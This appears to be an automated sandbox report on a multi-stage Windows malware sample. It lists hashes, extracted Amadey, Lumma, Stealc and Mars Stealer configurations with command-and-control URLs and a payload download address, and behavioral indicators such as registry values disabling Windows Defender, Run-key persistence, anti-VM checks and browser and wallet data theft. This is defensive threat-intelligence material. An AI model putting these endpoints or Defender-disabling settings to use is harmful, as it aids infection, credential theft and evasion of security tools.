Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
16/03/2025, 19:21
Static task
static1
Behavioral task
behavioral1
Sample
daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe
Resource
win10v2004-20250314-en
General
-
Target
daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe
-
Size
3.7MB
-
MD5
13ef8fe8386e9d1d01b6c3ad0c1c025e
-
SHA1
7b547b46572ca8580f553df2fe11024247a0a7c8
-
SHA256
daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30
-
SHA512
37afc90eb59af4dce9ec624ffad0edb39631c3c5c6c80d4460f7f08fcab11f8b7281f044c4ff65c5780903a63e8281e990cb995f81f355ae6f7053866b402187
-
SSDEEP
98304:z7Hcs51DVB/TaMcYb1j5b/s4sIUXo5E1RgbbO8ObKmM:zzc81DGMc2hLUo5ECiL
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://calmingtefxtures.run/api
https://foresctwhispers.top/api
https://htracnquilforest.life/api
https://presentymusse.world/api
https://deaddereaste.today/api
https://subawhipnator.life/api
https://privileggoe.live/api
https://boltetuurked.digital/api
https://pastedeputten.life/api
https://begindecafer.world/api
https://9garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://ksterpickced.digital/api
https://.cocjkoonpillow.today/api
https://zfeatureccus.shop/api
https://mrodularmall.top/api
https://jowinjoinery.icu/api
https://legenassedk.top/api
https://yhtardwarehu.icu/api
https://cjlaspcorne.icu/api
https://bugildbett.top/api
https://latchclan.shop/api
https://sloadoutle.life/api
https://caliberc.today/api
https://pistolpra.bet/api
https://weaponwo.life/api
https://armamenti.world/api
https://selfdefens.bet/api
https://targett.top/api
https://armoryarch.shop/api
https://blackeblast.run/api
https://kbracketba.shop/api
https://featureccus.shop/api
https://htardwarehu.icu/api
https://zfurrycomp.top/api
https://crosshairc.life/api
https://8cjlaspcorne.icu/api
https://adweaponrywo.digital/api
https://gunrightsp.run/api
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
marsstealer
Default
ctrlgem.xyz/gate.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/4632-906-0x0000000000690000-0x0000000000AE8000-memory.dmp healer behavioral1/memory/4632-907-0x0000000000690000-0x0000000000AE8000-memory.dmp healer behavioral1/memory/4632-1049-0x0000000000690000-0x0000000000AE8000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
Mars Stealer
An infostealer written in C++ based on other infostealers.
-
Marsstealer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 33f2847e3f.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 33f2847e3f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 33f2847e3f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 33f2847e3f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 33f2847e3f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 33f2847e3f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 33f2847e3f.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 33f2847e3f.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 33f2847e3f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 33f2847e3f.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 468e87ee11.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ O01E1PFQCANOPW8HSNTLUJ3W1YTXFCP.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempBPLL1T78XD12WX9QLGKDBDZN8J9VJ12N.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a27f672db5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2N2602.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dfcf8e0902.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fbaa8c5a41.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 33f2847e3f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fdff9a2307.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ UD49QH6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3P97i.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4dca848ac0.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 169 3604 powershell.exe 170 6680 powershell.exe -
pid Process 3940 powershell.exe 6308 powershell.exe 6452 powershell.exe 3604 powershell.exe 6680 powershell.exe -
Downloads MZ/PE file 18 IoCs
flow pid Process 77 436 rapes.exe 77 436 rapes.exe 77 436 rapes.exe 77 436 rapes.exe 77 436 rapes.exe 77 436 rapes.exe 77 436 rapes.exe 77 436 rapes.exe 77 436 rapes.exe 236 1576 BitLockerToGo.exe 69 1220 fbaa8c5a41.exe 169 3604 powershell.exe 170 6680 powershell.exe 23 436 rapes.exe 23 436 rapes.exe 23 436 rapes.exe 23 436 rapes.exe 23 436 rapes.exe -
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 33f2847e3f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempBPLL1T78XD12WX9QLGKDBDZN8J9VJ12N.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dfcf8e0902.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 468e87ee11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 468e87ee11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion O01E1PFQCANOPW8HSNTLUJ3W1YTXFCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempBPLL1T78XD12WX9QLGKDBDZN8J9VJ12N.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a27f672db5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fdff9a2307.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3P97i.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4dca848ac0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fbaa8c5a41.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 33f2847e3f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a27f672db5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fdff9a2307.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fbaa8c5a41.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion O01E1PFQCANOPW8HSNTLUJ3W1YTXFCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2N2602.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2N2602.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3P97i.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dfcf8e0902.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4dca848ac0.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 1J19x2.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation zY9sqWs.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation m0wsoI3.exe -
Executes dropped EXE 31 IoCs
pid Process 5336 C4O51.exe 3464 1J19x2.exe 436 rapes.exe 4028 2N2602.exe 4708 3P97i.exe 1332 8b964d8a09.exe 3128 dfcf8e0902.exe 224 4dca848ac0.exe 1220 fbaa8c5a41.exe 4816 rapes.exe 5892 468e87ee11.exe 3700 O01E1PFQCANOPW8HSNTLUJ3W1YTXFCP.exe 4356 19974cb86f.exe 4632 33f2847e3f.exe 4428 db8cc49cd2.exe 5340 TempBPLL1T78XD12WX9QLGKDBDZN8J9VJ12N.EXE 7100 a27f672db5.exe 6992 483d2fa8a0d53818306efeb32d3.exe 4268 zY9sqWs.exe 1188 Gxtuum.exe 4556 HmngBpR.exe 6236 SplashWin.exe 208 SplashWin.exe 6512 fdff9a2307.exe 1768 UD49QH6.exe 6708 rapes.exe 5000 Gxtuum.exe 2020 m0wsoI3.exe 2152 365bd6ccf1.exe 6672 365bd6ccf1.exe 4736 rapes.exe -
Identifies Wine through registry keys 2 TTPs 13 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine fdff9a2307.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine UD49QH6.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine dfcf8e0902.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 4dca848ac0.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 468e87ee11.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine O01E1PFQCANOPW8HSNTLUJ3W1YTXFCP.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 33f2847e3f.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 2N2602.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 3P97i.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine fbaa8c5a41.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine TempBPLL1T78XD12WX9QLGKDBDZN8J9VJ12N.EXE Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine a27f672db5.exe -
Loads dropped DLL 9 IoCs
pid Process 1332 8b964d8a09.exe 6236 SplashWin.exe 6236 SplashWin.exe 6236 SplashWin.exe 208 SplashWin.exe 208 SplashWin.exe 208 SplashWin.exe 2020 m0wsoI3.exe 2020 m0wsoI3.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 33f2847e3f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 33f2847e3f.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\468e87ee11.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10236370101\\468e87ee11.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\19974cb86f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10236380101\\19974cb86f.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\33f2847e3f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10236390101\\33f2847e3f.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\db8cc49cd2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10236400101\\db8cc49cd2.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10236410121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C4O51.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fbaa8c5a41.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10236360101\\fbaa8c5a41.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Public\desktop.ini firefox.exe File opened for modification C:\Users\Public\Documents\desktop.ini firefox.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000024251-147.dat autoit_exe behavioral1/files/0x0007000000024275-968.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
pid Process 4028 2N2602.exe 4708 3P97i.exe 3128 dfcf8e0902.exe 224 4dca848ac0.exe 1220 fbaa8c5a41.exe 5892 468e87ee11.exe 3700 O01E1PFQCANOPW8HSNTLUJ3W1YTXFCP.exe 4632 33f2847e3f.exe 5340 TempBPLL1T78XD12WX9QLGKDBDZN8J9VJ12N.EXE 7100 a27f672db5.exe 6992 483d2fa8a0d53818306efeb32d3.exe 6512 fdff9a2307.exe 1768 UD49QH6.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 208 set thread context of 2772 208 SplashWin.exe 158 PID 6512 set thread context of 1576 6512 fdff9a2307.exe 166 PID 2152 set thread context of 6672 2152 365bd6ccf1.exe 168 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 1J19x2.exe File created C:\Windows\Tasks\Gxtuum.job zY9sqWs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 53 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1J19x2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4dca848ac0.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 19974cb86f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 33f2847e3f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C4O51.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dfcf8e0902.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language O01E1PFQCANOPW8HSNTLUJ3W1YTXFCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 19974cb86f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language db8cc49cd2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempBPLL1T78XD12WX9QLGKDBDZN8J9VJ12N.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 365bd6ccf1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2N2602.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 19974cb86f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a27f672db5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3P97i.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fdff9a2307.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 365bd6ccf1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UD49QH6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m0wsoI3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fbaa8c5a41.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 468e87ee11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m0wsoI3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m0wsoI3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4460 timeout.exe 6516 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 5348 taskkill.exe 2512 taskkill.exe 3732 taskkill.exe 1040 taskkill.exe 5240 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3012 schtasks.exe 6592 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5300 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4028 2N2602.exe 4028 2N2602.exe 4708 3P97i.exe 4708 3P97i.exe 3128 dfcf8e0902.exe 3128 dfcf8e0902.exe 3128 dfcf8e0902.exe 3128 dfcf8e0902.exe 3128 dfcf8e0902.exe 3128 dfcf8e0902.exe 3128 dfcf8e0902.exe 3128 dfcf8e0902.exe 3128 dfcf8e0902.exe 3128 dfcf8e0902.exe 224 4dca848ac0.exe 224 4dca848ac0.exe 1220 fbaa8c5a41.exe 1220 fbaa8c5a41.exe 1220 fbaa8c5a41.exe 1220 fbaa8c5a41.exe 1220 fbaa8c5a41.exe 1220 fbaa8c5a41.exe 1220 fbaa8c5a41.exe 1220 fbaa8c5a41.exe 1220 fbaa8c5a41.exe 1220 fbaa8c5a41.exe 5892 468e87ee11.exe 5892 468e87ee11.exe 3700 O01E1PFQCANOPW8HSNTLUJ3W1YTXFCP.exe 3700 O01E1PFQCANOPW8HSNTLUJ3W1YTXFCP.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4632 33f2847e3f.exe 4632 33f2847e3f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4632 33f2847e3f.exe 4632 33f2847e3f.exe 4632 33f2847e3f.exe 3604 powershell.exe 3604 powershell.exe 3604 powershell.exe 5340 TempBPLL1T78XD12WX9QLGKDBDZN8J9VJ12N.EXE 5340 TempBPLL1T78XD12WX9QLGKDBDZN8J9VJ12N.EXE 3940 powershell.exe 3940 powershell.exe 3940 powershell.exe 6308 powershell.exe 6308 powershell.exe 6308 powershell.exe 6452 powershell.exe 6452 powershell.exe 6452 powershell.exe 6680 powershell.exe 6680 powershell.exe 6680 powershell.exe 7100 a27f672db5.exe 7100 a27f672db5.exe 6992 483d2fa8a0d53818306efeb32d3.exe 6992 483d2fa8a0d53818306efeb32d3.exe 4556 HmngBpR.exe 4556 HmngBpR.exe 4556 HmngBpR.exe 6236 SplashWin.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 208 SplashWin.exe 2772 cmd.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
